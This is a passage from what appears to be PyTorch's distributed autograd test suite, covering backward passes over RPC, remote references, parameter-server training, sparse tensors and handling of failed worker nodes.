self.context_cleanup_test_helper(rpc_args=(t1, t1), func=torch.add)
@dist_init
def test_context_cleanup_tensor_no_grad_sparse(self):
t1 = build_sparse_tensor(requires_grad=False)
self.context_cleanup_test_helper(rpc_args=(t1, t1), func=torch.add)
@dist_init
def test_context_cleanup_no_tensors(self):
self.context_cleanup_test_helper(rpc_args=(1, 1), func=my_scalar_add)
@dist_init
def test_context_cleanup_nested_rpc(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
dst_rank = (self.rank + 1) % self.world_size
args = (t1, t2, dst_rank, self.world_size, 0)
self.context_cleanup_test_helper(
rpc_args=args, func=my_py_nested_call, nested=True
)
@dist_init
def test_context_cleanup_nested_rpc_sparse(self):
t1 = build_sparse_tensor(requires_grad=True)
t2 = build_sparse_tensor(requires_grad=True)
dst_rank = (self.rank + 1) % self.world_size
args = (t1, t2, dst_rank, self.world_size, 0)
self.context_cleanup_test_helper(
rpc_args=args, func=my_py_nested_call, nested=True
)
@dist_init
def test_worker_ids_recorded(self):
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
# if no tensors require grad, we should still record worker_ids, as
# the autograd context ID is still passed to other workers.
t1 = torch.ones(3, 3, requires_grad=False)
t2 = torch.zeros(3, 3, requires_grad=False)
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), torch.add, args=(t1, t2))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# all worker_ids in dst_ranks should be recorded.
ctx = dist_autograd._current_context()
worker_ids = ctx._known_worker_ids()
self.assertEqual(worker_ids, dst_ranks)
# worker_ids should be recorded when tensors do require grad
t1.requires_grad = True
t2.requires_grad = True
for dst_rank in dst_ranks:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(t1, t2)
)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# all worker_ids in dst_ranks should be recorded.
worker_ids = ctx._known_worker_ids()
self.assertEqual(worker_ids, dst_ranks)
@dist_init
def test_dist_autograd_profiling(self):
with dist_autograd.context() as context_id:
t1 = torch.rand(3, 3, requires_grad=True)
t2 = torch.rand(3, 3, requires_grad=True)
loss = rpc.rpc_sync(worker_name(self._next_rank()), torch.add, args=(t1, t2)).sum()
with torch.autograd.profiler.profile() as p:
dist_autograd.backward(context_id, [loss])
function_events = p.function_events
def get_event(partial_key):
return [event for event in function_events if partial_key in event.name][0]
send_event = get_event("SendRpcBackward")
recv_event = get_event("RecvRpcBackward")
backward_event = get_event("torch::distributed::autograd::backward")
# There should be at least 1 send and recv_events each, corresponding to send/recv functions executed.
self.assertEqual(send_event.count, 1)
self.assertEqual(recv_event.count, 1)
# The CPU total for backward event should be great than send and recv, since
# applying those functions in the backwards pass is a subset of the entire backward pass.
self.assertGreater(backward_event.cpu_time_total, send_event.cpu_time_total)
self.assertGreater(backward_event.cpu_time_total, recv_event.cpu_time_total)
@dist_init
def test_error_in_context(self):
with dist_autograd.context() as context_id:
t1 = torch.rand(3, 3, requires_grad=True)
t2 = torch.rand(6, 6, requires_grad=True)
with self.assertRaises(RuntimeError):
# This should throw an error since matrix sizes don't match.
rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(t1, t2)
)
def _backward_no_grad_on_tensor(self, t1, t2, sparse):
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(
worker_name(self._next_rank()),
torch.add,
args=(t1, t2))
loss = my_sum(ret)
dist_autograd.backward(context_id, [loss], retain_graph=True)
self.assertIsNone(t1.grad)
self.assertIsNone(t2.grad)
# Now populate .grad with local autograd engine and
# verify dist autograd doesn't mess with it.
ret = torch.add(t1, t2)
loss_local = my_sum(ret)
loss_local.backward()
self.assertIsNotNone(t1.grad)
self.assertIsNotNone(t2.grad)
t1_grad_before = t1.grad
t2_grad_before = t2.grad
dist_autograd.backward(context_id, [loss])
self.assertEqual(t1_grad_before, t1.grad)
self.assertEqual(t2_grad_before, t2.grad)
@dist_init
def test_backward_no_grad_on_tensor(self):
self._backward_no_grad_on_tensor(
torch.rand((3, 3), requires_grad=True),
torch.rand((3, 3), requires_grad=True),
False
)
@dist_init
def test_backward_no_grad_on_tensor_sparse(self):
self._backward_no_grad_on_tensor(
build_sparse_tensor(requires_grad=True),
build_sparse_tensor(requires_grad=True),
True
)
# Run the same code locally and with dist autograd and verify gradients
# are same.
def _backward_simple(self, dst, t1, t2, local_grads, sparse):
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func_with_dst(
dst, exec_mode, torch.add, t1, t2
)
loss = my_sum(ret)
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_simple(self):
self._backward_simple(
self._next_rank(),
torch.rand((3, 3), requires_grad=True),
torch.rand((3, 3), requires_grad=True),
None,
False
)
@dist_init
def test_backward_simple_sparse(self):
self._backward_simple(
self._next_rank(),
build_sparse_tensor(requires_grad=True),
build_sparse_tensor(requires_grad=True),
None,
True
)
@dist_init
def test_backward_simple_self(self):
self._backward_simple(
self.rank,
torch.rand((3, 3), requires_grad=True),
torch.rand((3, 3), requires_grad=True),
None,
False
)
@dist_init
def test_backward_simple_self_sparse(self):
self._backward_simple(
self.rank,
build_sparse_tensor(requires_grad=True),
build_sparse_tensor(requires_grad=True),
None,
True
)
# The current rank first creates a tensor on the rref_owner, and then passes
# the rref with another tensor to the callee to run either my_rref_add or
# my_nested_rref_add, depending on whether the callee is the rref owner.
# The grad of tensor lives on the current rank, and the grad of the rref
# tensor lives on the rref owner.
def _backward_rref(self, callee, rref_owner, t1, t2, local_grads, sparse):
local_ret = torch.add(t1, t2)
local_ret = my_sum(local_ret)
local_ret.backward()
with dist_autograd.context() as context_id:
if sparse:
rref_t1 = rpc.remote(
rref_owner, build_sparse_tensor, args=(False, True,)
)
else:
rref_t1 = rpc.remote(
rref_owner, _torch_ones, args=((3, 3),), kwargs={"requires_grad": True}
)
if callee == rref_owner:
rref = rpc.remote(callee, my_rref_add, args=(rref_t1, t2))
else:
rref = rpc.remote(
callee, my_nested_rref_add, args=(rref_owner, rref_t1, t2)
)
ret = rref.to_here()
ret = my_sum(ret)
dist_autograd.backward(context_id, [ret])
# verify grads on caller
grads = dist_autograd.get_gradients(context_id)
self.assertIn(t2, grads)
self.assertEqual(grads[t2], t2.grad)
# verify grads on rref owner
self.assertTrue(
rpc.rpc_sync(
rref_owner,
_compare_owner_value,
args=(context_id, rref_t1, t1.grad),
)
)
@dist_init
def test_backward_rref(self):
callee = worker_name(self._next_rank())
rref_owner = callee
self._backward_rref(
callee,
rref_owner,
torch.rand((3, 3), requires_grad=True),
torch.rand((3, 3), requires_grad=True),
None,
False
)
@dist_init
def test_backward_rref_sparse(self):
callee = worker_name(self._next_rank())
rref_owner = callee
self._backward_rref(
callee,
rref_owner,
build_sparse_tensor(requires_grad=True),
build_sparse_tensor(requires_grad=True),
None,
True
)
@dist_init
def test_backward_rref_multi(self):
if self.rank > 0:
callee = "worker0"
rref_owner = callee
self._backward_rref(
callee,
rref_owner,
torch.rand((3, 3), requires_grad=True),
torch.rand((3, 3), requires_grad=True),
None,
False
)
@dist_init
def test_backward_rref_multi_sparse(self):
if self.rank > 0:
callee = "worker0"
rref_owner = callee
self._backward_rref(
callee,
rref_owner,
build_sparse_tensor(requires_grad=True),
build_sparse_tensor(requires_grad=True),
None,
True
)
@dist_init
def test_backward_rref_nested(self):
callee = worker_name((self.rank + 1) % self.world_size)
rref_owner = worker_name((self.rank + 2) % self.world_size)
self._backward_rref(
callee,
rref_owner,
torch.rand((3, 3), requires_grad=True),
torch.rand((3, 3), requires_grad=True),
None,
False
)
@dist_init
def test_backward_rref_nested_sparse(self):
callee = worker_name((self.rank + 1) % self.world_size)
rref_owner = worker_name((self.rank + 2) % self.world_size)
self._backward_rref(
callee,
rref_owner,
build_sparse_tensor(requires_grad=True),
build_sparse_tensor(requires_grad=True),
None,
True
)
# In this test, every rank will serve as a parameter server (ps) and a
# driver, and then kicks off trainers on the other three ranks. So, we have:
# ps = rank0 with trainers = rank1/2/3
# ps = rank2 with trainers = rank2/3/0
# ps = rank3 with trainers = rank3/0/1
# ps = rank4 with trainers = rank0/1/2
#
# These four test ps-trainer groups run on completely separate autograd
# graphs, but they share the same set of underlying RpcAgents.
def _test_trainer_ps(self, create_ref_fn, trainer_fn, sparse):
if sparse:
t1 = build_sparse_tensor(requires_grad=True)
t2 = build_sparse_tensor(requires_grad=True)
else:
t1 = torch.ones((3, 3), requires_grad=True)
t2 = torch.zeros((3, 3), requires_grad=True)
local_ret = torch.add(t1, t2)
my_sum(local_ret).backward()
# create rref on self
rref_t1 = rpc.remote(
worker_name(self.rank),
create_ref_fn,
args=())
# kick off forward and backward pass on three other workers (trainers)
rank_diffs = [1, 2, 3]
futures = []
for rank_diff in rank_diffs:
futures.append(
rpc.rpc_async(
worker_name((self.rank + rank_diff) % self.world_size),
trainer_fn,
args=(rref_t1, t2, worker_name(self.rank), rank_diff),
)
)
# check if the trainers have done with their backward pass
for rank_diff in rank_diffs:
self._check_rpc_done(rank_diff)
# trainers are done and holding the context for verification
accumulate_grad_func = None
for rank_diff in rank_diffs:
# make sure grads are accumulated for the same tensors and values
# are all correct
ctx_id = ctx_ids[rank_diff]
grads = dist_autograd.get_gradients(ctx_id)
local_t1 = rref_t1.to_here()
self.assertIn(local_t1, grads)
self.assertEqual(grads[local_t1], t1.grad)
# unblock trainers
_set_rpc_done(None, 0)
# wait until all trainers are done
torch.futures.wait_all(futures)
@dist_init
def test_trainer_ps(self):
self._test_trainer_ps(
create_tensor,
_run_trainer,
False
)
@dist_init
def test_trainer_ps_sparse(self):
self._test_trainer_ps(
build_sparse_tensor,
_run_trainer,
True
)
@dist_init
def test_trainer_ps_torchscript_functions(self):
# TODO, need more investigation
# there is rref leak when shutting down, suspect it is because
# ref as arg is passed to pybind boundary, and the ref is not garbage
# collected by python when calling shutdown()
import torch.distributed.rpc.api as api
api._ignore_rref_leak = True
self._test_trainer_ps(create_torchscript_tensor, _run_trainer_torchscript, False)
def _backward_multiple_round_trips(self, t1, t2, t3, t4, t5, local_grads):
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
# Multiple RPCs between different nodes.
val = self._exec_func(exec_mode, torch.add, t1, t2)
val = self._exec_func(exec_mode, torch.mul, t3, val)
s1 = self._exec_func(exec_mode, torch.stack, (t4, val))
s2 = self._exec_func(exec_mode, torch.stack, (t5, val))
if s1.is_sparse:
val = self._exec_func(exec_mode, torch.mul, s1, s2)
val = self._exec_func(exec_mode, torch.mul, val, val)
loss = torch.sparse.sum(val)
else:
val = self._exec_func(exec_mode, torch.bmm, s1, s2)
val = self._exec_func(exec_mode, torch.matmul, val, val)
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t3, t4, t5
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_multiple_round_trips(self):
self._backward_multiple_round_trips(
torch.rand((3, 3), requires_grad=True),
torch.rand((3, 3)),
torch.rand((3, 3), requires_grad=True),
torch.rand((3, 3)),
torch.rand((3, 3), requires_grad=True),
None
)
@dist_init
def test_backward_multiple_round_trips_sparse(self):
self._backward_multiple_round_trips(
build_sparse_tensor(requires_grad=True),
build_sparse_tensor(requires_grad=False),
build_sparse_tensor(requires_grad=True),
build_sparse_tensor(requires_grad=False),
build_sparse_tensor(requires_grad=True),
None
)
@dist_init
def test_backward_different_tensor_dims(self):
local_grads = None
t1 = torch.rand((4, 6), requires_grad=True)
t2 = torch.rand((6, 5))
t3 = torch.rand((5, 7), requires_grad=True)
t4 = torch.rand((7, 9))
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
val = self._exec_func(exec_mode, torch.matmul, t1, t2)
val = self._exec_func(exec_mode, torch.linalg.multi_dot, (val, t3, t4))
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t2, t3, t4
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_unused_tensors(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
s = self._exec_func(exec_mode, torch.stack, (t1, t2, t3))
val = self._exec_func(
exec_mode,
torch.matmul,
torch.narrow(s, 0, 0, 1),
torch.narrow(s, 0, 2, 1),
)
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t3
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_multiple_output_tensors(self):
local_grads = None
t = torch.rand((10, 2), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
tensor_list = self._exec_func(exec_mode, torch.split, t, 2)
t1 = tensor_list[0]
t2 = tensor_list[2]
t3 = tensor_list[4]
val = self._exec_func(exec_mode, torch.linalg.multi_dot, (t1, t2, t3))
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t
)
local_grads = ret if ret else local_grads
def _run_test_backward_unused_send_function_in_thread(self):
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
# We don't use the result of an RPC function, as a result the
# backward pass would hang in the "FAST" mode.
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
val = torch.mul(t1, t2)
# Run backward, this would hang forever.
dist_autograd.backward(context_id, [val.sum()])
@dist_init
def test_backward_unused_send_function(self):
# Run the test in a thread which would never finish.
t = threading.Thread(
target=self._run_test_backward_unused_send_function_in_thread
)
t.daemon = True
t.start()
t.join(10) # Wait for 10s.
# Verify thread is still alive (indicating backward hasn't completed yet).
self.assertTrue(t.is_alive())
@dist_init
def test_backward_autograd_engine_error(self):
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
# Perform some ops before error simulation.
tmp = (t1 + t2) * (t1 + t2)
t3 = SimulateBackwardError.apply(tmp)
# Run multiple round trips across different nodes and verify the
# original node receives an error thrown on a node deep in the chain.
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t2, t3)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.mul, args=(val, t2)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(val, t2)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.div, args=(val, t2)
)
with self.assertRaisesRegex(
RuntimeError, "Error on Node [0-9]+: Simulate error on backward pass"
):
# Run backwards, and validate we receive an error.
dist_autograd.backward(context_id, [val.sum()])
@dist_init(clean_shutdown=False)
@sandcastle_skip_if(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_backward_node_failure(self):
rpc._set_rpc_timeout(5) # 5 seconds
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
# Wait for all RPCs to be done.
dist.barrier()
# Kill all odd rank nodes.
if self.rank % 2 == 0:
shutdown_error_regex = self.get_shutdown_error_regex()
# Wait for all other nodes to die.
for rank in range(self.world_size):
if rank % 2 != 0:
wait_until_node_failure(rank, shutdown_error_regex)
# Shutdown sequence is not very well defined and as a result
# we might see any error given by get_shutdown_error_regex()
with self.assertRaisesRegex(RuntimeError, shutdown_error_regex):
# Run backwards, and validate we receive an error since all
# other nodes are dead.
dist_autograd.backward(context_id, [res.sum()])
else:
# Exit all other nodes.
pass
@dist_init
def test_backward_without_context(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
context_id = 100 # dummy context_id
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
dist_autograd.backward(context_id, [res.sum()])
@dist_init
def test_backward_without_rpc(self):
dst_rank = self.rank
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = torch.add(t1, t2)
dist_autograd.backward(context_id, [t3.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertIn(t1, grads)
self.assertIn(t2, grads)
self.assertEqual(torch.ones(3, 3), grads[t1])
self.assertEqual(torch.ones(3, 3), grads[t2])
@dist_init
def test_backward_invalid_args(self):
with dist_autograd.context() as context_id:
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
dist_autograd.backward(context_id, None)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
dist_autograd.backward(None, None)
with self.assertRaisesRegex(
RuntimeError, "No tensors provided for gradient computation"
):
dist_autograd.backward(context_id, [])
with self.assertRaisesRegex(RuntimeError, "requires_grad not set on"):
t = torch.rand(3, 3)
dist_autograd.backward(context_id, [t])
with self.assertRaisesRegex(
RuntimeError, "is not a scalar, all roots need to be scalar"
):
t = torch.rand(3, 3, requires_grad=True)
dist_autograd.backward(context_id, [t])
with self.assertRaisesRegex(
RuntimeError, "does not have a valid gradient function"
):
t = torch.rand(1, requires_grad=True)
dist_autograd.backward(context_id, [t])
@dist_init
def test_backward_multiple_roots(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
r1 = self._exec_func(exec_mode, torch.add, t1, t2).sum()
r2 = self._exec_func(exec_mode, torch.mul, t1, t2).sum()
r3 = self._exec_func(exec_mode, torch.cos, t1).sum()
r4 = self._exec_func(exec_mode, torch.div, t1, t2).sum()
local_grads = self._verify_backwards(
exec_mode, [r1, r2, r3, r4], context_id, local_grads, t1, t2
)
def _backward_different_dtypes(self, t1, t2):
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
loss = self._exec_func(exec_mode, torch.add, t1, t2)
loss = my_sum(loss)
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_different_dtypes(self):
self._backward_different_dtypes(
torch.rand((3, 3), requires_grad=True, dtype=torch.float32),
torch.rand((3, 3), requires_grad=True, dtype=torch.float64)
)
@dist_init
def test_backward_different_dtypes_sparse(self):
self._backward_different_dtypes(
build_sparse_tensor(requires_grad=True, dtype=torch.float32),
build_sparse_tensor(requires_grad=True, dtype=torch.float64)
)
# Run the same code locally and with dist autograd and verify gradients
# are same.
def _backward_simple_python_udf(self, t1, t2):
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(exec_mode, my_py_add, t1, t2)
loss = my_sum(ret)
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_simple_python_udf(self):
self._backward_simple_python_udf(
torch.rand(3, 3, requires_grad=True),
torch.rand(3, 3, requires_grad=True)
)
@dist_init
def test_backward_simple_python_udf_sparse(self):
self._backward_simple_python_udf(
build_sparse_tensor(requires_grad=True),
build_sparse_tensor(requires_grad=True)
)
# Run the same code locally and with dist autograd and verify gradients
# are same.
def _backward_simple_script_call(self, t1, t2):
local_grads = None
for exec_mode in [
ExecMode.LOCAL,
ExecMode.RPC_SYNC,
ExecMode.RPC_ASYNC,
ExecMode.REMOTE,
]:
with dist_autograd.context() as context_id:
forward_ret = self._exec_func(exec_mode, my_script_add, t1, t2)
loss = my_sum(forward_ret)
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_simple_script_call(self):
self._backward_simple_script_call(
torch.rand(3, 3, requires_grad=True),
torch.rand(3, 3, requires_grad=True)
)
@dist_init
def test_backward_simple_script_call_sparse(self):
self._backward_simple_script_call(
build_sparse_tensor(requires_grad=True),
build_sparse_tensor(requires_grad=True)
)
@staticmethod
def _complex_python_udf(t1, t2):
t3 = torch.nn.functional.linear(t1, t2)
t4 = torch.nn.functional.linear(t2, t3)
t5 = torch.nn.functional.linear(t3, t4)
return torch.linalg.multi_dot([t1, t2, t3, t4, t5])
@dist_init
def test_backward_complex_python_udf(self):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(
exec_mode, DistAutogradTest._complex_python_udf, t1, t2
)
loss = ret.sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@staticmethod
def _python_udf_with_backward_error(t1, t2):
t3 = t1 + t2
t4 = SimulateBackwardError.apply(t3)
return torch.linalg.multi_dot([t1, t2, t3, t4])
@staticmethod
def _nested_rpc_call_backward_error(t1, t2, dst):
t1 = t1 * t2
t2 = t1 + t2
res = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._python_udf_with_backward_error,
args=(t1, t2),
)
return torch.linalg.multi_dot([t1, t2, res])
@dist_init
def test_backward_python_udf_error(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._nested_rpc_call_backward_error,
args=(t1, t2, self._next_rank()),
)
with self.assertRaisesRegex(
RuntimeError, "Simulate error on backward pass"
):
dist_autograd.backward(context_id, [loss.sum()])
_backward_done = False
@dist_init(clean_shutdown=False)
@sandcastle_skip_if(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_backward_node_failure_python_udf(self):
# Set a short timeout to quickly time out failed RPCs.
rpc._set_rpc_timeout(5) # 5 seconds
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
dst = self._next_rank()
res = rpc.rpc_sync(
worker_name(dst),
my_py_nested_call,
args=(t1, t2, dst, self.world_size, 1),
)
dist.barrier()
# Kill rank 2 (last hop of nested rpc) and verify rank 0 receives an error.
if self.rank == 2:
return
store = dist.distributed_c10d._get_default_store()
if self.rank == 0:
# Wait for rank 2 to die.
shutdown_error_regex = self.get_shutdown_error_regex()
wait_until_node_failure(2, shutdown_error_regex)
# Shutdown sequence is not very well defined and as a result
# we might see any error given by get_shutdown_error_regex().
with self.assertRaisesRegex(RuntimeError, shutdown_error_regex):
# Run backwards, and validate we receive an error since rank 2 is dead.
dist_autograd.backward(context_id, [res.sum()])
# Mark rank 0 is done in the store, since the RPC framework on
# some nodes might be broken at this point.
store.set('test_backward_node_failure_python_udf_rank0_done', "True")
else:
# Wait for backward to finish on rank 0.
store.wait(['test_backward_node_failure_python_udf_rank0_done'], timedelta(seconds=10))
@staticmethod
def _nested_python_udf(t1, t2, dst):
t3 = t1 * t2
t4 = t1 + t2
res = rpc.rpc_sync(worker_name(dst), my_py_add, args=(t3, t4))
return t1 * t2 * t3 * t4 * res
def _backwards_nested_python_udf(self, t1, t2):
t3 = t1 * t2
t4 = t1 + t2
res = t3 + t4
ret = t1 * t2 * t3 * t4 * res
loss = my_sum(ret)
torch.autograd.backward([loss])
# Now run distributed autograd.
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._nested_python_udf,
args=(t1, t2, self._next_rank()),
)
loss = my_sum(ret)
dist_autograd.backward(context_id, [loss])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
@dist_init
def test_backwards_nested_python_udf(self):
# Run equivalent of _nested_python_udf locally.
self._backwards_nested_python_udf(
torch.rand(3, 3, requires_grad=True),
torch.rand(3, 3, requires_grad=True)
)
@dist_init
def test_backwards_nested_python_udf_sparse(self):
# Run equivalent of _nested_python_udf locally.
self._backwards_nested_python_udf(
build_sparse_tensor(requires_grad=True),
build_sparse_tensor(requires_grad=True)
)
_test_clean_context_backward_context_id = None
class MyBackwardFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
assert DistAutogradTest._test_clean_context_backward_context_id is not None
# Release the context to simulate error (use barrier before releasing
# context to ensure all nodes execute the backward function).
dist.barrier()
dist_autograd._release_context(
DistAutogradTest._test_clean_context_backward_context_id
)
# Verify all contexts are cleaned up.
assert _all_contexts_cleaned_up()
return input
@dist_init
def test_clean_context_during_backward(self):
"""
This test simulates the situation where the 'backward' call might throw
an exception locally which would lead to the autograd context being
cleaned up if we're using the context manager. As a result, the autograd
context might be cleaned up while some threads are still using the
autograd context.
It is fine for the 'backward' call to throw an exception in this test,
but the process should not crash.
"""
initialize_pg(self.file_init_method, self.rank, self.world_size)
context = dist_autograd._new_context()
context_id = context._context_id()
DistAutogradTest._test_clean_context_backward_context_id = context_id
# Send the context id to all nodes.
for i in range(0, self.world_size):
if i != self.rank:
rank_distance = (i - self.rank + self.world_size) % self.world_size
rpc.rpc_sync(
worker_name(i),
_set_rpc_done,
args=(context_id, rank_distance),
)
dist.barrier()
# Verify all context ids have been received.
self.assertEqual(self.world_size - 1, len(known_context_ids))
t1 = torch.rand((3, 3), requires_grad=True)
for i in range(0, 100):
dst = self._next_rank()
t1 = rpc.rpc_sync(worker_name(dst), torch.add, args=(t1, t1))
# Call MyBackwardFunc as the first op of the backward pass to
# ensure we release the context early in the backward pass.
t1 = DistAutogradTest.MyBackwardFunc.apply(t1)
self.assertEqual(100, len(context._send_functions()))
context_id = 100 # dummy context_id
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
dist_autograd.backward(context_id, [t1.sum()])
# HACK: Killing workers since otherwise the autograd engine gets stuck on
# other nodes. The proper fix would be addressing:
# https://github.com/pytorch/pytorch/issues/27643, which would inform
# other nodes about the failure.
# The autograd engine gets stuck on other nodes since they're waiting to
# receive gradients from the node that received an error (and as a
# result it didn't execute the rest of the graph).
dist.barrier()
rpc.shutdown(graceful=False)
sys.exit(0)
@classmethod
def _call_remote_embedding(cls, embedding_rref, input, offsets, per_sample_weights):
embedding = embedding_rref.local_value()
return embedding(input, offsets, per_sample_weights)
@classmethod
def _get_grad(cls, embedding_rref, context_id):
embedding = embedding_rref.local_value()
grad_map = dist_autograd.get_gradients(context_id)
return grad_map[embedding.weight]
@dist_init
def test_embedding_bag_with_no_grad_tensors(self):
dst = self._next_rank()
remote_embedding = rpc.remote(
worker_name(dst),
torch.nn.EmbeddingBag,
args=(16, 16),
kwargs={"mode": "sum", "sparse": True},
)
local_embedding = torch.nn.EmbeddingBag(16, 16, mode="sum", sparse=True)
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
# requires_grad = True to record send/recv functions
per_sample_weights = torch.rand((8), requires_grad=True)
offsets = torch.LongTensor([0, 4])
local_res = local_embedding(input, offsets, per_sample_weights)
# Run backward twice.
torch.autograd.backward([local_res.sum()], retain_graph=True)
torch.autograd.backward([local_res.sum()])
local_grad = local_embedding.weight.grad
with dist_autograd.context() as context_id:
res = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._call_remote_embedding,
args=(remote_embedding, input, offsets, per_sample_weights),
)
# Run backward twice to test accumulation of sparse gradients.
dist_autograd.backward(context_id, [res.sum()], retain_graph=True)
dist_autograd.backward(context_id, [res.sum()])
remote_grad = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._get_grad,
args=(remote_embedding, context_id),
)
self.assertEqual(local_grad, remote_grad)
@classmethod
def _mixed_requires_grad_operaton(cls, t1, t2):
if t2.requires_grad:
return t1 - t2
else:
return t1 * t2
def _mixed_requires_grad(self, t1, t2):
for exec_mode in [ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(
exec_mode, DistAutogradTest._mixed_requires_grad_operaton, t1, t2
)
self.assertEqual(t1 * t2, ret)
loss = my_sum(ret)
dist_autograd.backward(context_id, [loss])
self.assertTrue(t1.requires_grad)
self.assertFalse(t2.requires_grad)
grads = dist_autograd.get_gradients(context_id)
self.assertIn(t1, grads)
self.assertNotIn(t2, grads)
self.assertEqual(t2, grads[t1])
@dist_init
def test_mixed_requires_grad(self):
self._mixed_requires_grad(
torch.rand(3, 3, requires_grad=True),
torch.rand(3, 3, requires_grad=False)
)
@dist_init
def test_mixed_requires_grad_sparse(self):
self._mixed_requires_grad(
build_sparse_tensor(requires_grad=True),
build_sparse_tensor(requires_grad=False)
)
class TestDebugInfoFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
debug_info = dist_autograd._get_debug_info()
assert debug_info is not None
backward_passes = int(debug_info["num_current_backward_passes"])
# Hard to validate exact numbers because of the distributed nature.
# We can't use a barrier() here since that would block the single
# CPU thread available for autograd and can cause deadlocks.
